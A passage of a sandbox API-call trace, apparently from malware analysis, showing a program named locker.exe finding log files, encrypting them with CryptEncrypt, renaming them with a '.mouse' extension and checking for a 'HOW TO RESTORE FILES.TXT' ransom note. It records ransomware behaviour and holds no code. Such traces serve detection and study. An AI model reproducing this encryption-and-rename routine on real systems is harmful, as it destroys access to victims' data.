hHeap=0x3c0000, dwFlags=0x0, lpMem=0x40a668 | out: hHeap=0x3c0000) returned 1 [0197.789] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x419cd8 | out: hHeap=0x3c0000) returned 1 [0197.789] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x419d68 | out: hHeap=0x3c0000) returned 1 [0197.789] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42bcd0 | out: hHeap=0x3c0000) returned 1 [0197.789] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x43ccb0 | out: hHeap=0x3c0000) returned 1 [0197.789] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42bc98 | out: hHeap=0x3c0000) returned 1 [0197.789] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42b218 | out: hHeap=0x3c0000) returned 1 [0197.789] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x40aa20 | out: hHeap=0x3c0000) returned 1 [0197.789] FindNextFileW (in: hFindFile=0x432d78, lpFindFileData=0x12af88c | out: lpFindFileData=0x12af88c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x973abb0f, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x973abb0f, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x980eecb6, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x1774, dwReserved0=0x40aa20, dwReserved1=0xa6b2, cFileName="oobe_2017_09_07_03_08_57_737.log", cAlternateFileName="")) returned 1 [0197.789] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x50) returned 0x4356d8 [0197.790] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x4356d8 | out: hHeap=0x3c0000) returned 1 [0197.790] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x70) returned 0x41fe78 [0197.790] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x50) returned 0x4353c0 [0197.790] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="oobe_2017_09_07_03_08_57_737.log", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0197.790] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x30) returned 0x42b218 [0197.790] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="oobe_2017_09_07_03_08_57_737.log", cchWideChar=32, lpMultiByteStr=0x42b218, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oobe_2017_09_07_03_08_57_737.log", lpUsedDefaultChar=0x0) returned 32 [0197.790] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x4353c0 | out: hHeap=0x3c0000) returned 1 [0197.867] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log", cchWideChar=52, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 52 [0197.867] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x40) returned 0x437288 [0197.867] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log", cchWideChar=52, lpMultiByteStr=0x437288, cbMultiByte=52, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log", lpUsedDefaultChar=0x0) returned 52 [0197.868] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log", cchWideChar=52, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 52 [0197.868] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x40) returned 0x436dc0 [0197.868] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log", cchWideChar=52, lpMultiByteStr=0x436dc0, cbMultiByte=52, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log", lpUsedDefaultChar=0x0) returned 52 [0197.868] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log", cchWideChar=52, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 52 [0197.868] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x40) returned 0x436ca0 [0197.868] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log", cchWideChar=52, lpMultiByteStr=0x436ca0, cbMultiByte=52, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log", lpUsedDefaultChar=0x0) returned 52 [0197.868] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log", cchWideChar=52, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 52 [0197.868] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x40) returned 0x436868 [0197.868] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log", cchWideChar=52, lpMultiByteStr=0x436868, cbMultiByte=52, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log", lpUsedDefaultChar=0x0) returned 52 [0197.868] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x436868 | out: hHeap=0x3c0000) returned 1 [0197.868] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x436ca0 | out: hHeap=0x3c0000) returned 1 [0197.868] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x436dc0 | out: hHeap=0x3c0000) returned 1 [0197.868] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x437288 | out: hHeap=0x3c0000) returned 1 [0197.868] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x12af9d0, nSize=0x104 | out: lpFilename="C:\\Users\\FD1HVy\\Desktop\\locker.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\locker.exe")) returned 0x22 [0197.868] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x30) returned 0x42bd08 [0197.902] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr=".log", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0197.903] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr=".log", cchWideChar=4, lpMultiByteStr=0x12afc3c, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".log", lpUsedDefaultChar=0x0) returned 4 [0197.903] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x30) returned 0x42b918 [0197.903] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$GetCurrent\\Logs", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0197.903] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x20) returned 0x43ccb0 [0197.903] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$GetCurrent\\Logs", cchWideChar=19, lpMultiByteStr=0x43ccb0, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\$GetCurrent\\Logs", lpUsedDefaultChar=0x0) returned 19 [0197.903] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42b918 | out: hHeap=0x3c0000) returned 1 [0197.903] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x20) returned 0x43cb20 [0197.903] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x30) returned 0x42bb10 [0197.903] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x43cb20 | out: hHeap=0x3c0000) returned 1 [0197.903] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x30) returned 0x42be58 [0197.903] AreFileApisANSI () returned 1 [0197.903] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x42be58, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0197.903] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x5a) returned 0x3ec888 [0197.904] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x42be58, cbMultiByte=-1, lpWideCharStr=0x3ec888, cchWideChar=45 | out: lpWideCharStr="C:\\$GetCurrent\\Logs\\HOW TO RESTORE FILES.TXT") returned 45 [0197.904] GetFileAttributesExW (in: lpFileName="C:\\$GetCurrent\\Logs\\HOW TO RESTORE FILES.TXT" (normalized: "c:\\$getcurrent\\logs\\how to restore files.txt"), fInfoLevelId=0x0, lpFileInformation=0x12afa6c | out: lpFileInformation=0x12afa6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7657229b, ftCreationTime.dwHighDateTime=0x1d6ad29, ftLastAccessTime.dwLowDateTime=0x7657229b, ftLastAccessTime.dwHighDateTime=0x1d6ad29, ftLastWriteTime.dwLowDateTime=0x7657229b, ftLastWriteTime.dwHighDateTime=0x1d6ad29, nFileSizeHigh=0x0, nFileSizeLow=0x71)) returned 1 [0197.904] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3ec888 | out: hHeap=0x3c0000) returned 1 [0197.904] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42be58 | out: hHeap=0x3c0000) returned 1 [0197.904] GetFileAttributesExW (in: lpFileName="C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log" (normalized: "c:\\$getcurrent\\logs\\oobe_2017_09_07_03_08_57_737.log"), fInfoLevelId=0x0, lpFileInformation=0x12afa04 | out: lpFileInformation=0x12afa04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x973abb0f, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x973abb0f, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x980eecb6, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x1774)) returned 1 [0197.906] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x70) returned 0x4202b0 [0197.907] CreateFileW (lpFileName="C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log" (normalized: "c:\\$getcurrent\\logs\\oobe_2017_09_07_03_08_57_737.log"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3bc [0197.907] GetFileSize (in: hFile=0x3bc, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1774 [0197.907] CloseHandle (hObject=0x3bc) returned 1 [0197.907] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x4202b0 | out: hHeap=0x3c0000) returned 1 [0197.907] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x70) returned 0x420148 [0197.907] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x420148 | out: hHeap=0x3c0000) returned 1 [0197.907] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x70) returned 0x4201c0 [0197.907] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x4201c0 | out: hHeap=0x3c0000) returned 1 [0197.907] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x12af898, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0197.907] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x10) returned 0x43d7d0 [0197.907] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x12af898, cbMultiByte=-1, lpWideCharStr=0x43d7d0, cchWideChar=7 | out: lpWideCharStr=".mouse") returned 7 [0197.907] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x43d7d0 | out: hHeap=0x3c0000) returned 1 [0197.907] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x70) returned 0x4200d0 [0197.907] CreateFileW (lpFileName="C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log" (normalized: "c:\\$getcurrent\\logs\\oobe_2017_09_07_03_08_57_737.log"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3bc [0197.908] GetFileSize (in: hFile=0x3bc, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1774 [0197.908] CloseHandle (hObject=0x3bc) returned 1 [0197.908] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x4200d0 | out: hHeap=0x3c0000) returned 1 [0197.908] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x8) returned 0x419ce8 [0197.908] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x8) returned 0x419cb8 [0197.909] CreateFileW (lpFileName="C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log" (normalized: "c:\\$getcurrent\\logs\\oobe_2017_09_07_03_08_57_737.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x12af700, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3bc [0197.909] GetFileType (hFile=0x3bc) returned 0x1 [0197.909] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x1794) returned 0x43e570 [0197.909] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x1794) returned 0x445608 [0197.911] ReadFile (in: hFile=0x3bc, lpBuffer=0x43e570, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12af770, lpOverlapped=0x0 | out: lpBuffer=0x43e570*, lpNumberOfBytesRead=0x12af770*=0x1000, lpOverlapped=0x0) returned 1 [0197.913] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x1000) returned 0x3f6f08 [0197.914] ReadFile (in: hFile=0x3bc, lpBuffer=0x3f6f08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12af714, lpOverlapped=0x0 | out: lpBuffer=0x3f6f08*, lpNumberOfBytesRead=0x12af714*=0x774, lpOverlapped=0x0) returned 1 [0197.914] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x1774, lpNewFilePointer=0x0, dwMoveMethod=0x12af758 | out: lpNewFilePointer=0x0) returned 1 [0197.914] GetVersion () returned 0x23f00206 [0197.914] CryptAcquireContextA (in: phProv=0x12af890, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12af890*=0x40a668) returned 1 [0197.918] CryptImportKey (in: hProv=0x40a668, pbData=0x12af8bc, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x12af894 | out: phKey=0x12af894*=0x432c78) returned 1 [0197.919] CryptSetKeyParam (hKey=0x432c78, dwParam=0x4, pbData=0x12af888*=0x2, dwFlags=0x0) returned 1 [0197.919] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x1020) returned 0x446da8 [0197.919] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x446da8*, pdwDataLen=0x12af88c*=0x1000, dwBufLen=0x1020 | out: pbData=0x446da8*, pdwDataLen=0x12af88c*=0x1010) returned 1 [0197.919] CryptDestroyKey (hKey=0x432c78) returned 1 [0197.919] CryptReleaseContext (hProv=0x40a668, dwFlags=0x0) returned 1 [0197.919] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12af758 | out: lpNewFilePointer=0x0) returned 1 [0197.919] GetLastError () returned 0x0 [0197.919] SetLastError (dwErrCode=0x0) [0197.919] WriteFile (in: hFile=0x3bc, lpBuffer=0x446da8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x12af704, lpOverlapped=0x0 | out: lpBuffer=0x446da8*, lpNumberOfBytesWritten=0x12af704*=0x1000, lpOverlapped=0x0) returned 1 [0197.919] GetLastError () returned 0x0 [0197.920] SetLastError (dwErrCode=0x0) [0197.920] GetLastError () returned 0x0 [0197.920] SetLastError (dwErrCode=0x0) [0197.920] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x446da8 | out: hHeap=0x3c0000) returned 1 [0197.920] WriteFile (in: hFile=0x3bc, lpBuffer=0x3f6f08*, nNumberOfBytesToWrite=0x784, lpNumberOfBytesWritten=0x12af7c8, lpOverlapped=0x0 | out: lpBuffer=0x3f6f08*, lpNumberOfBytesWritten=0x12af7c8*=0x784, lpOverlapped=0x0) returned 1 [0197.920] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3f6f08 | out: hHeap=0x3c0000) returned 1 [0197.920] CloseHandle (hObject=0x3bc) returned 1 [0197.923] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x43e570 | out: hHeap=0x3c0000) returned 1 [0197.923] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x445608 | out: hHeap=0x3c0000) returned 1 [0197.923] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x70) returned 0x4203a0 [0197.923] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x12af898, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0197.923] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x10) returned 0x43d6e0 [0197.923] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x12af898, cbMultiByte=-1, lpWideCharStr=0x43d6e0, cchWideChar=7 | out: lpWideCharStr=".mouse") returned 7 [0197.923] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x43d6e0 | out: hHeap=0x3c0000) returned 1 [0197.923] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0xa6) returned 0x3efa30 [0197.923] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x4203a0 | out: hHeap=0x3c0000) returned 1 [0197.923] MoveFileExW (lpExistingFileName="C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log" (normalized: "c:\\$getcurrent\\logs\\oobe_2017_09_07_03_08_57_737.log"), lpNewFileName="C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log.mouse" (normalized: "c:\\$getcurrent\\logs\\oobe_2017_09_07_03_08_57_737.log.mouse"), dwFlags=0x2) returned 1 [0197.924] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x80) returned 0x40a668 [0197.924] CreateFileW (lpFileName="C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log.mouse" (normalized: "c:\\$getcurrent\\logs\\oobe_2017_09_07_03_08_57_737.log.mouse"), dwDesiredAccess=0x100, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0x3bc [0197.924] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x12af840 | out: lpSystemTimeAsFileTime=0x12af840) [0197.924] SetFileTime (hFile=0x3bc, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x12af888) returned 1 [0197.924] CloseHandle (hObject=0x3bc) returned 1 [0197.924] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x40a668 | out: hHeap=0x3c0000) returned 1 [0197.924] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3efa30 | out: hHeap=0x3c0000) returned 1 [0197.924] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x419cb8 | out: hHeap=0x3c0000) returned 1 [0197.924] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x419ce8 | out: hHeap=0x3c0000) returned 1 [0197.924] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42bb10 | out: hHeap=0x3c0000) returned 1 [0197.925] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x43ccb0 | out: hHeap=0x3c0000) returned 1 [0197.925] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42bd08 | out: hHeap=0x3c0000) returned 1 [0197.925] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42b218 | out: hHeap=0x3c0000) returned 1 [0197.925] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x41fe78 | out: hHeap=0x3c0000) returned 1 [0197.925] FindNextFileW (in: hFindFile=0x432d78, lpFindFileData=0x12af88c | out: lpFindFileData=0x12af88c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c5a0a89, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x9c5a0a89, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xbb3747bd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x28, dwReserved0=0x41fe78, dwReserved1=0x1774, cFileName="PartnerSetupCompleteResult.log", cAlternateFileName="")) returned 1 [0197.925] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x40) returned 0x437288 [0197.925] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x437288 | out: hHeap=0x3c0000) returned 1 [0197.925] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x70) returned 0x4203a0 [0197.925] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x40) returned 0x437288 [0197.925] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="PartnerSetupCompleteResult.log", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0197.925] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x20) returned 0x43cc10 [0197.925] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="PartnerSetupCompleteResult.log", cchWideChar=30, lpMultiByteStr=0x43cc10, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PartnerSetupCompleteResult.log", lpUsedDefaultChar=0x0) returned 30 [0197.925] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x437288 | out: hHeap=0x3c0000) returned 1 [0197.925] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log", cchWideChar=50, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 50 [0197.925] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x40) returned 0x437288 [0197.925] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log", cchWideChar=50, lpMultiByteStr=0x437288, cbMultiByte=50, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log", lpUsedDefaultChar=0x0) returned 50 [0197.925] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log", cchWideChar=50, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 50 [0197.925] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x40) returned 0x436ca0 [0197.925] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log", cchWideChar=50, lpMultiByteStr=0x436ca0, cbMultiByte=50, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log", lpUsedDefaultChar=0x0) returned 50 [0197.925] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log", cchWideChar=50, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 50 [0197.925] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x40) returned 0x436dc0 [0197.925] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log", cchWideChar=50, lpMultiByteStr=0x436dc0, cbMultiByte=50, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log", lpUsedDefaultChar=0x0) returned 50 [0197.926] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log", cchWideChar=50, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 50 [0197.926] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x40) returned 0x436bc8 [0197.926] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log", cchWideChar=50, lpMultiByteStr=0x436bc8, cbMultiByte=50, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log", lpUsedDefaultChar=0x0) returned 50 [0197.926] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x436bc8 | out: hHeap=0x3c0000) returned 1 [0197.926] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x436dc0 | out: hHeap=0x3c0000) returned 1 [0197.926] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x436ca0 | out: hHeap=0x3c0000) returned 1 [0197.926] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x437288 | out: hHeap=0x3c0000) returned 1 [0197.926] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x12af9d0, nSize=0x104 | out: lpFilename="C:\\Users\\FD1HVy\\Desktop\\locker.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\locker.exe")) returned 0x22 [0197.926] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x30) returned 0x42b218 [0197.926] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr=".log", cchWideChar=4, lpMultiByteStr=0x0, 